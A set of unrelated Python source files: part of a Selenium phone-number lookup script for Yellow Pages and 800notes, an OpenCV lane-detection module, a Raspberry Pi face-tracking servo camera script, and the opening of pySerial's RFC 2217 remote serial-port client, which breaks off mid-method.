addressPeople(soup)
try:
driver.get('https://www.yellowpages.com/search?search_terms=%s' % teleBBB)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(5)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
fivehundred = soup.find(text=re.compile(r"Internal Server Error"))
soup.prettify()
type(fivehundred) is str
while fivehundred != None:
time.sleep(20)
driver.get(
'https://www.yellowpages.com/search?search_terms=%s' % teleBBB)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
fivehundred = soup.find(text=re.compile(r"Internal Server Error"))
soup.prettify()
type(fivehundred) is str
secondMatch = soup.find(text=re.compile(r"We did not find any business"))
soup.prettify()
type(secondMatch) is str
blocked(soup)
if secondMatch is None:
businessEntries(soup)
businessName(soup)
addressBus(street, locality, postal, soup)
# My last addition. Full composition brief note taker.
if website == 'A':
if dragNDrop != '':
nestedName = preName
if(os.path.isfile(nestedName + "_rev_YellowPages.xlsx")):
workman = xlrd.open_workbook(nestedName + "_rev_YellowPages.xlsx")
workboy = workman.sheet_by_name('Sheet1')
busName = workboy.cell(idx + 1, 6).value
busAddy = workboy.cell(idx + 1, 7).value
else:
busName = ""
busAddy = ""
if(os.path.isfile(nestedName + "_rev_800notes.xlsx")):
workman = xlrd.open_workbook(nestedName + "_rev_800notes.xlsx")
workboy = workman.sheet_by_name('Sheet1')
eightDate = workboy.cell(idx + 1, 9).value
eightMessages = workboy.cell(idx + 1, 10).value
eightMessages = str(eightMessages)[:-2]
eightSentiment = workboy.cell(idx + 1, 7).value
else:
eightDate = "N/A"
eightMessages = "0"
eightSentiment = ""
reviewNote = 'BN={0}; BA={1}; BW=; CB=; CT=; 8N={2} | {3} COMMENTS IN THE PAST YEAR; N/K={4};'.format(busName, busAddy, eightDate, eightMessages, eightSentiment)
worksheet.write(idx + 1, 1, reviewNote)
# Close up Shop!
if website == '2' or website == '3' or website == '4' or website == '5':
driver.close()
workbook.close()
# Determine if file was dragged or not for creation of Dirs.
if dragNDrop == '':
if not os.path.exists('WorkingDir'):
os.makedirs('WorkingDir')
if not os.path.exists('WorkingDir/' + preName):
os.makedirs('WorkingDir/' + preName)
# Was the file originally a CSV? (prepRev now holds the base name, so check the extension on fileName itself.)
if fileName.endswith('.csv'):
totalName = preName + '.xlsx'
else:
totalName = fileName
# If we haven't already moved all of the files, here we go.
if dragNDrop == '':
copyfile(preName + ".xlsx", 'WorkingDir/' + preName + '/' + preName + ".xlsx")
move(preName + siteType, 'WorkingDir/' + preName + '/' + preName
+ siteType)
# Delete the PYC
if os.path.isfile('Harvard.pyc'):
os.remove('Harvard.pyc')
# End Animation.
done = True
print('\nDing! Job Done!')
|
road_model.py
|
import cv2
import numpy as np
import threading
from typing import Union
from openpilot.models.lane_detect.lane_config import BASE_TU, BASE_CU
from openpilot.models.lane_detect.hough_lines import HoughLanesImage
from openpilot.models.lane_detect.lane_models.lane_generator_hough import LaneGeneratorCUHough, LaneGeneratorTUHough, YellowLineSlidersMixin
class HSVFilterMixinOrig:
def _process_X(self, orig_image) -> Union[None, np.ndarray]:
image = orig_image
# crop image
h, w = image.shape[:2]
#image = image[200:h - 20, 20:550]
# create hsv
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
#low_val = (0, 0, 0)
#high_val = (179, 45, 96)
low_val = np.uint8(self._y_vec[:3])
high_val = np.uint8(self._y_vec[3:])
# Threshold the HSV image
mask = cv2.inRange(hsv, low_val, high_val)
# remove noise
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=np.ones((8, 8), dtype=np.uint8))
# close mask
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel=np.ones((20, 20), dtype=np.uint8))
# improve mask by drawing the convexhull
contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
hull = cv2.convexHull(cnt)
cv2.drawContours(mask, [hull], 0, (255), -1)
# erode mask a bit to mitigate mask bleed of the convex hull
mask = cv2.morphologyEx(mask, cv2.MORPH_ERODE, kernel=np.ones((5, 5), dtype=np.uint8))
# NOTE: returning the masked road here makes the remaining steps below unreachable;
# they are kept to show the original full pipeline.
road = cv2.bitwise_and(image, image, mask=mask)
return road
# apply mask to hsv image
road_hsv = cv2.bitwise_and(hsv, hsv, mask=mask)
# set lower and upper color limits
low_val = (0, 0, 102)
high_val = (179, 255, 255)
# Threshold the HSV image
mask2 = cv2.inRange(road_hsv, low_val, high_val)
# apply mask to original image
return cv2.bitwise_and(image, image, mask=mask2)
class HSVFilterMixin1:
"""
HSV params
low_val = (0, 0, 0)
high_val = (179, 45, 96)
"""
ROIS = [(0, 460), (0, 720), (1280, 720), (1280, 460), (840, 260), (400, 260)] # roi vertices
def _process_X(self, orig_image) -> Union[None, np.ndarray]:
image = orig_image
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV) # creates HSV image
low_val = np.uint8(self._y_vec[:3])
high_val = np.uint8(self._y_vec[3:])
# Threshold the HSV image
mask = cv2.inRange(hsv, low_val, high_val)
# remove noise
#mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=np.ones((8, 8), dtype=np.uint8))
# close mask
#mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel=np.ones((20, 20), dtype=np.uint8))
# improve mask by drawing the convexhull
#contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#for cnt in contours:
# hull = cv2.convexHull(cnt)
# cv2.drawContours(mask, [hull], 0, (255), -1)
# erode mask a bit to mitigate mask bleed of the convex hull
#mask = cv2.morphologyEx(mask, cv2.MORPH_ERODE, kernel=np.ones((5, 5), dtype=np.uint8))
# masked road image (used as the input to the Hough transform below)
road = cv2.bitwise_and(image, image, mask=mask)
hough_params = { 'rho': 1
, 'theta': np.pi / 180.
, 'threshold': 30
, 'min_line_len': 20
, 'max_line_gap': 20
, 'gray_range': (150, 255)
, 'canny_range': (100, 200)
, }
cl = HoughLanesImage(road
, roi_vertices=self.ROIS
, hough_params=hough_params )
hough_img = cv2.cvtColor(cl.show_lines(road.shape[:2], pixel_tol=2).astype(np.uint8) * 255, cv2.COLOR_BGR2RGB)
# return cv2.addWeighted(orig_image, 0.6, hough_img, 0.8, 0)
return cv2.addWeighted(road, 0.6, hough_img, 0.8, 0)
# # apply mask to hsv image
# road_hsv = cv2.bitwise_and(hsv, hsv, mask=mask)
# # set lower and upper color limits
# low_val = (0, 0, 102)
# high_val = (179, 255, 255)
# # Threshold the HSV image
# mask2 = cv2.inRange(road_hsv, low_val, high_val)
# # apply mask to original image
# return cv2.bitwise_and(image, image, mask=mask2)
class HSVLineTU(HSVFilterMixin1, LaneGeneratorTUHough ):
# good values for y are
# (0, 175, 0) - (255,255,255)
# (0, 175, 180) - (255,255,255) <- THIS IS CHOSEN
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._y_vec = [0, 175, 180, 255, 255, 255]
class HSVLineCU(HSVFilterMixin1, LaneGeneratorCUHough):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._y_vec = [0, 175, 180, 255, 255, 255]
class HSVLineTUSliders(YellowLineSlidersMixin, HSVLineTU):
""" Yellow line but with sliders.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# add the sliders from Tkinter
sliders_th = threading.Thread(target = lambda : self._sliders())
sliders_th.start()
class HSVLineCUSliders(YellowLineSlidersMixin, HSVLineCU):
""" Yellow line but with sliders.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# add the sliders from Tkinter
sliders_th = threading.Thread(target = lambda : self._sliders())
sliders_th.start()
# examples
def example_2():
# new_image_size = (590, 1640, 3)
batch_size = 32
train_percentage = 0.8
train_generator = HSVLineTUSliders( BASE_TU
, to_train = True
, train_percentage = train_percentage
, batch_size=batch_size
, scale_img= 1.)
train_generator.show_movie_cont()
def example_1():
# new_image_size = (590, 1640, 3)
scale_size = 1.
batch_size = 32
train_percentage = 0.8
train_generator = HSVLineCUSliders( BASE_CU
, to_train = True
, train_percentage = train_percentage
, batch_size=batch_size )
train_generator.show_movie_cont()
if __name__ == '__main__':
    example_2()
|
openvino_fd_capture.py
|
import cv2 as cv
import sys
import logging
import time
from picamera.array import PiRGBArray
from picamera import PiCamera
from utils.PCA9685 import PCA9685
from queue import Queue
from threading import Thread
logging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s', level=logging.INFO)
# Load the model
t = time.time()
net = cv.dnn.readNet('models/hello/face-detection-adas-0001.xml', 'models/hello/face-detection-adas-0001.bin')
logging.info("load model cost %f" % (time.time() - t))
# Specify target device
net.setPreferableTarget(cv.dnn.DNN_TARGET_MYRIAD)
screen_size = (640, 480)
def run_camera(q):
# Load Camera
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(640, 480))
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
image = frame.array
# Prepare input blob and perform an inference
t = time.time()
blob = cv.dnn.blobFromImage(image, size=(672, 384), ddepth=cv.CV_8U)
net.setInput(blob)
out = net.forward()
logging.debug("inference cost %f" % (time.time() - t))
# Draw detected faces on the image
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
xmin = int(detection[3] * image.shape[1])
ymin = int(detection[4] * image.shape[0])
xmax = int(detection[5] * image.shape[1])
ymax = int(detection[6] * image.shape[0])
x_mid = (xmin+xmax)/2
y_mid = (ymin+ymax)/2
if confidence > 0.5:
# compare y coordinates against half the image height and x coordinates against half the width
if ymin > image.shape[0]/2:
q.put("down")
if ymax < image.shape[0]/2:
q.put("up")
if xmin > image.shape[1]/2:
q.put("right")
if xmax < image.shape[1]/2:
q.put("left")
logging.debug("xmin=%s, ymin=%s, xmax=%s, ymax=%s"%(xmin, ymin, xmax, ymax))
cv.rectangle(image, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))
# Save the frame to an image file
# cv.imwrite('out.png', image)
# show the frame
cv.imshow("Frame", image)
key = cv.waitKey(1) & 0xFF
logging.debug("key=%s" % key)
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
# arrow keys nudge the camera; if the `q` key was pressed, break from the loop
if key == 81:
q.put("left")
if key == 82:
q.put("up")
if key == 83:
q.put("right")
if key == 84:
q.put("down")
if key == ord("q"):
q.put("exit")
break
def run_move(q):
channel_yaw = 7
channel_pitch = 15
pos_yaw = 1400
pos_pitch = 1400
default_step = 100
max_pos = 2400
min_pos = 600
# init pwm
pwm = PCA9685(0x40)
pwm.setPWMFreq(50)
pwm.setServoPulse(channel_yaw, pos_yaw)
pwm.setServoPulse(channel_pitch, pos_pitch)
while True:
data = q.get()
logging.info("move=%s" % str(data))
if data == 'exit':
break
elif data == "left":
pos_yaw += default_step
pos_yaw = min(max(min_pos, pos_yaw), max_pos)
pwm.setServoPulse(channel_yaw, pos_yaw)
elif data == "right":
pos_yaw -= default_step
pos_yaw = min(max(min_pos, pos_yaw), max_pos)
pwm.setServoPulse(channel_yaw, pos_yaw)
elif data == "up":
pos_pitch += default_step
pos_pitch = min(max(min_pos, pos_pitch), max_pos)
pwm.setServoPulse(channel_pitch, pos_pitch)
elif data == "down":
pos_pitch -= default_step
pos_pitch = min(max(min_pos, pos_pitch), max_pos)
pwm.setServoPulse(channel_pitch, pos_pitch)
logging.debug("pos_yaw=%s,pos_pitch=%s" % (pos_yaw, pos_pitch))
if __name__ == '__main__':
    q = Queue()
    t1 = Thread(target=run_move, args=(q,))
    t2 = Thread(target=run_camera, args=(q,))
    t1.start()
    t2.start()
|
rfc2217.py
|
#! python
#
# This module implements an RFC 2217 compatible client. RFC 2217 describes a
# protocol to access serial ports over TCP/IP and allows setting the baud rate,
# modem control lines, etc.
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2001-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
# TODO:
# - setting control line -> answer is not checked (had problems with one of the
# servers). consider implementing a compatibility mode flag to make the check
# conditional
# - write timeout not implemented at all
# ###########################################################################
# observations and issues with servers
# ===========================================================================
# sredird V2.2.1
# - http://www.ibiblio.org/pub/Linux/system/serial/ sredird-2.2.2.tar.gz
# - does not acknowledge SET_CONTROL (RTS/DTR) correctly, always responding
# [105 1] instead of the actual value.
# - SET_BAUDRATE answer contains 4 extra null bytes -> probably for larger
# numbers than 2**32?
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: while true; do nc -l -p 7000 -c "sredird debug /dev/ttyUSB0 /var/lock/sredir"; done
# ===========================================================================
# telnetcpcd (untested)
# - http://ftp.wayne.edu/kermit/sredird/telnetcpcd-1.09.tar.gz
# - To get the signature [COM_PORT_OPTION] w/o data has to be sent.
# ===========================================================================
# ser2net
# - does not negotiate BINARY or COM_PORT_OPTION for his side but at least
# acknowledges that the client activates these options
# - The configuration may be that the server prints a banner. As this client
# implementation does a flushInput on connect, this banner is hidden from
# the user application.
# - NOTIFY_MODEMSTATE: the poll interval of the server seems to be one
# second.
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: run ser2net daemon, in /etc/ser2net.conf:
# 2000:telnet:0:/dev/ttyS0:9600 remctl banner
# ###########################################################################
# How to identify ports? pySerial might want to support other protocols in the
# future, so lets use an URL scheme.
# for RFC2217 compliant servers we will use this:
# rfc2217://<host>:<port>[?option[&option...]]
#
# options:
# - "logging" set log level print diagnostic messages (e.g. "logging=debug")
# - "ign_set_control": do not look at the answers to SET_CONTROL
# - "poll_modem": issue NOTIFY_MODEMSTATE requests when CTS/DTR/RI/CD is read.
# Without this option it expects that the server sends notifications
# automatically on change (which most servers do and is according to the
# RFC).
# the order of the options is not relevant
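#
# A minimal usage sketch (illustrative only; the host, port and option values
# below are placeholders): the URL is handed to pySerial's serial_for_url(),
# which dispatches to this module and parses the options in Serial.from_url()
# further down.
#
#   import serial
#   s = serial.serial_for_url('rfc2217://localhost:7000?logging=debug',
#                             baudrate=9600, timeout=3)
#   s.write(b'hello')
#   print(s.read(5))
#   s.close()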
import logging
import socket
import struct
import threading
import time
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
import Queue
except ImportError:
import queue as Queue
import serial
from serial.serialutil import SerialBase, SerialException, to_bytes, \
iterbytes, portNotOpenError, Timeout
# port string is expected to be something like this:
# rfc2217://host:port
# host may be an IP or including domain, whatever.
# port is 0...65535
# map log level names to constants. used in from_url()
LOGGER_LEVELS = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
}
# telnet protocol characters
SE = b'\xf0' # Subnegotiation End
NOP = b'\xf1' # No Operation
DM = b'\xf2' # Data Mark
BRK = b'\xf3' # Break
IP = b'\xf4' # Interrupt process
AO = b'\xf5' # Abort output
AYT = b'\xf6' # Are You There
EC = b'\xf7' # Erase Character
EL = b'\xf8' # Erase Line
GA = b'\xf9' # Go Ahead
SB = b'\xfa' # Subnegotiation Begin
WILL = b'\xfb'
WONT = b'\xfc'
DO = b'\xfd'
DONT = b'\xfe'
IAC = b'\xff' # Interpret As Command
IAC_DOUBLED = b'\xff\xff'
# selected telnet options
BINARY = b'\x00' # 8-bit data path
ECHO = b'\x01' # echo
SGA = b'\x03' # suppress go ahead
# RFC2217
COM_PORT_OPTION = b'\x2c'
# Client to Access Server
SET_BAUDRATE = b'\x01'
SET_DATASIZE = b'\x02'
SET_PARITY = b'\x03'
SET_STOPSIZE = b'\x04'
SET_CONTROL = b'\x05'
NOTIFY_LINESTATE = b'\x06'
NOTIFY_MODEMSTATE = b'\x07'
FLOWCONTROL_SUSPEND = b'\x08'
FLOWCONTROL_RESUME = b'\x09'
SET_LINESTATE_MASK = b'\x0a'
SET_MODEMSTATE_MASK = b'\x0b'
PURGE_DATA = b'\x0c'
SERVER_SET_BAUDRATE = b'\x65'
SERVER_SET_DATASIZE = b'\x66'
SERVER_SET_PARITY = b'\x67'
SERVER_SET_STOPSIZE = b'\x68'
SERVER_SET_CONTROL = b'\x69'
SERVER_NOTIFY_LINESTATE = b'\x6a'
SERVER_NOTIFY_MODEMSTATE = b'\x6b'
SERVER_FLOWCONTROL_SUSPEND = b'\x6c'
SERVER_FLOWCONTROL_RESUME = b'\x6d'
SERVER_SET_LINESTATE_MASK = b'\x6e'
SERVER_SET_MODEMSTATE_MASK = b'\x6f'
SERVER_PURGE_DATA = b'\x70'
RFC2217_ANSWER_MAP = {
SET_BAUDRATE: SERVER_SET_BAUDRATE,
SET_DATASIZE: SERVER_SET_DATASIZE,
SET_PARITY: SERVER_SET_PARITY,
SET_STOPSIZE: SERVER_SET_STOPSIZE,
SET_CONTROL: SERVER_SET_CONTROL,
NOTIFY_LINESTATE: SERVER_NOTIFY_LINESTATE,
NOTIFY_MODEMSTATE: SERVER_NOTIFY_MODEMSTATE,
FLOWCONTROL_SUSPEND: SERVER_FLOWCONTROL_SUSPEND,
FLOWCONTROL_RESUME: SERVER_FLOWCONTROL_RESUME,
SET_LINESTATE_MASK: SERVER_SET_LINESTATE_MASK,
SET_MODEMSTATE_MASK: SERVER_SET_MODEMSTATE_MASK,
PURGE_DATA: SERVER_PURGE_DATA,
}
SET_CONTROL_REQ_FLOW_SETTING = b'\x00' # Request Com Port Flow Control Setting (outbound/both)
SET_CONTROL_USE_NO_FLOW_CONTROL = b'\x01' # Use No Flow Control (outbound/both)
SET_CONTROL_USE_SW_FLOW_CONTROL = b'\x02' # Use XON/XOFF Flow Control (outbound/both)
SET_CONTROL_USE_HW_FLOW_CONTROL = b'\x03' # Use HARDWARE Flow Control (outbound/both)
SET_CONTROL_REQ_BREAK_STATE = b'\x04' # Request BREAK State
SET_CONTROL_BREAK_ON = b'\x05' # Set BREAK State ON
SET_CONTROL_BREAK_OFF = b'\x06' # Set BREAK State OFF
SET_CONTROL_REQ_DTR = b'\x07' # Request DTR Signal State
SET_CONTROL_DTR_ON = b'\x08' # Set DTR Signal State ON
SET_CONTROL_DTR_OFF = b'\x09' # Set DTR Signal State OFF
SET_CONTROL_REQ_RTS = b'\x0a' # Request RTS Signal State
SET_CONTROL_RTS_ON = b'\x0b' # Set RTS Signal State ON
SET_CONTROL_RTS_OFF = b'\x0c' # Set RTS Signal State OFF
SET_CONTROL_REQ_FLOW_SETTING_IN = b'\x0d' # Request Com Port Flow Control Setting (inbound)
SET_CONTROL_USE_NO_FLOW_CONTROL_IN = b'\x0e' # Use No Flow Control (inbound)
SET_CONTROL_USE_SW_FLOW_CONTOL_IN = b'\x0f' # Use XON/XOFF Flow Control (inbound)
SET_CONTROL_USE_HW_FLOW_CONTOL_IN = b'\x10' # Use HARDWARE Flow Control (inbound)
SET_CONTROL_USE_DCD_FLOW_CONTROL = b'\x11' # Use DCD Flow Control (outbound/both)
SET_CONTROL_USE_DTR_FLOW_CONTROL = b'\x12' # Use DTR Flow Control (inbound)
SET_CONTROL_USE_DSR_FLOW_CONTROL = b'\x13' # Use DSR Flow Control (outbound/both)
LINESTATE_MASK_TIMEOUT = 128 # Time-out Error
LINESTATE_MASK_SHIFTREG_EMPTY = 64 # Transfer Shift Register Empty
LINESTATE_MASK_TRANSREG_EMPTY = 32 # Transfer Holding Register Empty
LINESTATE_MASK_BREAK_DETECT = 16 # Break-detect Error
LINESTATE_MASK_FRAMING_ERROR = 8 # Framing Error
LINESTATE_MASK_PARTIY_ERROR = 4 # Parity Error
LINESTATE_MASK_OVERRUN_ERROR = 2 # Overrun Error
LINESTATE_MASK_DATA_READY = 1 # Data Ready
MODEMSTATE_MASK_CD = 128 # Receive Line Signal Detect (also known as Carrier Detect)
MODEMSTATE_MASK_RI = 64 # Ring Indicator
MODEMSTATE_MASK_DSR = 32 # Data-Set-Ready Signal State
MODEMSTATE_MASK_CTS = 16 # Clear-To-Send Signal State
MODEMSTATE_MASK_CD_CHANGE = 8 # Delta Receive Line Signal Detect
MODEMSTATE_MASK_RI_CHANGE = 4 # Trailing-edge Ring Detector
MODEMSTATE_MASK_DSR_CHANGE = 2 # Delta Data-Set-Ready
MODEMSTATE_MASK_CTS_CHANGE = 1 # Delta Clear-To-Send
PURGE_RECEIVE_BUFFER = b'\x01' # Purge access server receive data buffer
PURGE_TRANSMIT_BUFFER = b'\x02' # Purge access server transmit data buffer
PURGE_BOTH_BUFFERS = b'\x03' # Purge both the access server receive data
# buffer and the access server transmit data buffer
RFC2217_PARITY_MAP = {
serial.PARITY_NONE: 1,
serial.PARITY_ODD: 2,
serial.PARITY_EVEN: 3,
serial.PARITY_MARK: 4,
serial.PARITY_SPACE: 5,
}
RFC2217_REVERSE_PARITY_MAP = dict((v, k) for k, v in RFC2217_PARITY_MAP.items())
RFC2217_STOPBIT_MAP = {
serial.STOPBITS_ONE: 1,
serial.STOPBITS_ONE_POINT_FIVE: 3,
serial.STOPBITS_TWO: 2,
}
RFC2217_REVERSE_STOPBIT_MAP = dict((v, k) for k, v in RFC2217_STOPBIT_MAP.items())
# Telnet filter states
M_NORMAL = 0
M_IAC_SEEN = 1
M_NEGOTIATE = 2
# TelnetOption and TelnetSubnegotiation states
REQUESTED = 'REQUESTED'
ACTIVE = 'ACTIVE'
INACTIVE = 'INACTIVE'
REALLY_INACTIVE = 'REALLY_INACTIVE'
class TelnetOption(object):
"""Manage a single telnet option, keeps track of DO/DONT WILL/WONT."""
def __init__(self, connection, name, option, send_yes, send_no, ack_yes,
ack_no, initial_state, activation_callback=None):
"""\
Initialize option.
:param connection: connection used to transmit answers
:param name: a readable name for debug outputs
:param send_yes: what to send when option is to be enabled.
:param send_no: what to send when option is to be disabled.
:param ack_yes: what to expect when remote agrees on option.
:param ack_no: what to expect when remote disagrees on option.
:param initial_state: options initialized with REQUESTED are tried to
be enabled on startup. use INACTIVE for all others.
"""
self.connection = connection
self.name = name
self.option = option
self.send_yes = send_yes
self.send_no = send_no
self.ack_yes = ack_yes
self.ack_no = ack_no
self.state = initial_state
self.active = False
self.activation_callback = activation_callback
def __repr__(self):
"""String for debug outputs"""
return "{o.name}:{o.active}({o.state})".format(o=self)
def process_incoming(self, command):
"""\
A DO/DONT/WILL/WONT was received for this option, update state and
answer when needed.
"""
if command == self.ack_yes:
if self.state is REQUESTED:
self.state = ACTIVE
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is ACTIVE:
pass
elif self.state is INACTIVE:
self.state = ACTIVE
self.connection.telnet_send_option(self.send_yes, self.option)
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is REALLY_INACTIVE:
self.connection.telnet_send_option(self.send_no, self.option)
else:
raise ValueError('option in illegal state {!r}'.format(self))
elif command == self.ack_no:
if self.state is REQUESTED:
self.state = INACTIVE
self.active = False
elif self.state is ACTIVE:
self.state = INACTIVE
self.connection.telnet_send_option(self.send_no, self.option)
self.active = False
elif self.state is INACTIVE:
pass
elif self.state is REALLY_INACTIVE:
pass
else:
raise ValueError('option in illegal state {!r}'.format(self))
class TelnetSubnegotiation(object):
"""\
A object to handle subnegotiation of options. In this case actually
sub-sub options for RFC 2217. It is used to track com port options.
"""
def __init__(self, connection, name, option, ack_option=None):
if ack_option is None:
ack_option = option
self.connection = connection
self.name = name
self.option = option
self.value = None
self.ack_option = ack_option
self.state = INACTIVE
def __repr__(self):
"""String for debug outputs."""
return "{sn.name}:{sn.state}".format(sn=self)
def set(self, value):
"""\
Request a change of the value. A request is sent to the server. If the
client needs to know whether the change was performed, it has to check the
state of this object.
"""
self.value = value
self.state = REQUESTED
self.connection.rfc2217_send_subnegotiation(self.option, self.value)
if self.connection.logger:
self.connection.logger.debug("SB Requesting {} -> {!r}".format(self.name, self.value))
def is_ready(self):
"""\
Check if answer from server has been received. when server rejects
the change, raise a ValueError.
"""
if self.state == REALLY_INACTIVE:
raise ValueError("remote rejected value for option {!r}".format(self.name))
return self.state == ACTIVE
# add property to have a similar interface as TelnetOption
active = property(is_ready)
def wait(self, timeout=3):
"""\
Wait until the subnegotiation has been acknowledged or timeout. It
can also throw a value error when the answer from the server does not
match the value sent.
"""
timeout_timer = Timeout(timeout)
while not timeout_timer.expired():
time.sleep(0.05) # prevent 100% CPU load
if self.is_ready():
break
else:
raise SerialException("timeout while waiting for option {!r}".format(self.name))
def check_answer(self, suboption):
"""\
Check an incoming subnegotiation block. The parameter has already had the
header (suboption number and COM port option value) stripped off.
"""
if self.value == suboption[:len(self.value)]:
self.state = ACTIVE
else:
# error propagation done in is_ready
self.state = REALLY_INACTIVE
if self.connection.logger:
self.connection.logger.debug("SB Answer {} -> {!r} -> {}".format(self.name, suboption, self.state))
class Serial(SerialBase):
"""Serial port implementation for RFC 2217 remote serial ports."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def __init__(self, *args, **kwargs):
self._thread = None
self._socket = None
self._linestate = 0
self._modemstate = None
self._modemstate_timeout = Timeout(-1)
self._remote_suspend_flow = False
self._write_lock = None
self.logger = None
self._ignore_set_control_answer = False
self._poll_modem_state = False
self._network_timeout = 3
self._telnet_options = None
self._rfc2217_port_settings = None
self._rfc2217_options = None
self._read_buffer = None
super(Serial, self).__init__(*args, **kwargs) # must be last call in case of auto-open
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
self.logger = None
self._ignore_set_control_answer = False
self._poll_modem_state = False
self._network_timeout = 3
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self.is_open:
raise SerialException("Port is already open.")
try:
self._socket = socket.create_connection(self.from_url(self.portstr), timeout=5) # XXX good value?
self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except Exception as msg:
self._socket = None
raise SerialException("Could not open port {}: {}".format(self.portstr, msg))
# use a thread safe queue as buffer. it also simplifies implementing
# the read timeout
self._read_buffer = Queue.Queue()
# to ensure that user writes do not interfere with internal
# telnet/rfc2217 option handling, establish a lock
self._write_lock = threading.Lock()
# name the following separately so that, below, a check can be easily done
mandadory_options = [
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED),
]
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, REQUESTED),
] + mandadory_options
# RFC 2217 specific states
# COM port settings
self._rfc2217_port_settings = {
'baudrate': TelnetSubnegotiation(self, 'baudrate', SET_BAUDRATE, SERVER_SET_BAUDRATE),
'datasize': TelnetSubnegotiation(self, 'datasize', SET_DATASIZE, SERVER_SET_DATASIZE),
'parity': TelnetSubnegotiation(self, 'parity', SET_PARITY, SERVER_SET_PARITY),
'stopsize': TelnetSubnegotiation(self, 'stopsize', SET_STOPSIZE, SERVER_SET_STOPSIZE),
}
# There are more subnegotiation objects, combine all in one dictionary
# for easy access
self._rfc2217_options = {
'purge': TelnetSubnegotiation(self, 'purge', PURGE_DATA, SERVER_PURGE_DATA),
'control': TelnetSubnegotiation(self, 'control', SET_CONTROL, SERVER_SET_CONTROL),
}
self._rfc2217_options.update(self._rfc2217_port_settings)
# cache for line and modem states that the server sends to us
self._linestate = 0
self._modemstate = None
self._modemstate_timeout = Timeout(-1)
# RFC 2217 flow control between server and client
self._remote_suspend_flow = False
self.is_open = True
self._thread = threading.Thread(target=self._telnet_read_loop)
self._thread.setDaemon(True)
self._thread.setName('pySerial RFC 2217 reader thread for {}'.format(self._port))
self._thread.start()
try: # must clean-up if open fails
# negotiate Telnet/RFC 2217 -> send initial requests
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnet_send_option(option.send_yes, option.option)
# now wait until important options are negotiated
timeout = Timeout(self._network_timeout)
while not timeout.expired():
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in mandadory_options) == sum(o.state != INACTIVE for o in mandadory_options):
break
else:
raise SerialException(
"Remote does not seem to support RFC2217 or BINARY mode {!r}".format(mandadory_options))
if self.logger:
self.logger.info("Negotiated options: {}".format(self._telnet_options))
# fine, go on, set RFC 2271 specific things
self._reconfigure_port()
# all things are set up, now get a clean start
if not self._dsrdtr:
self._update_dtr_state()
if not self._rtscts:
self._update_rts_state()
self.reset_input_buffer()
self.reset_output_buffer()
except:
self.close()
raise
def _reconfigure_port(self):
"""Set communication parameters on opened port."""
if self._socket is None:
raise SerialException("Can only operate on open ports")
# if self._timeout != 0 and self._interCharTimeout is not None:
# XXX
if self._write_timeout is not None:
raise NotImplementedError('write_timeout is currently not supported')
# XXX
# Setup the connection
# to get good performance, all parameter changes are sent first...
if not 0 < self._baudrate < 2 ** 32:
raise ValueError("invalid baudrate: {!r}".format(self._baudrate))
self._rfc2217_port_settings['baudrate'].set(struct.pack(b'!I', self._baudrate))
self._rfc2217_port_settings['datasize'].set(struct.pack(b'!B', self._bytesize))
self._rfc2217_port_settings['parity'].set(struct.pack(b'!B', RFC2217_PARITY_MAP[self._parity]))
self._rfc2217_port_settings['stopsize'].set(struct.pack(b'!B', RFC2217_STOPBIT_MAP[self._stopbits]))
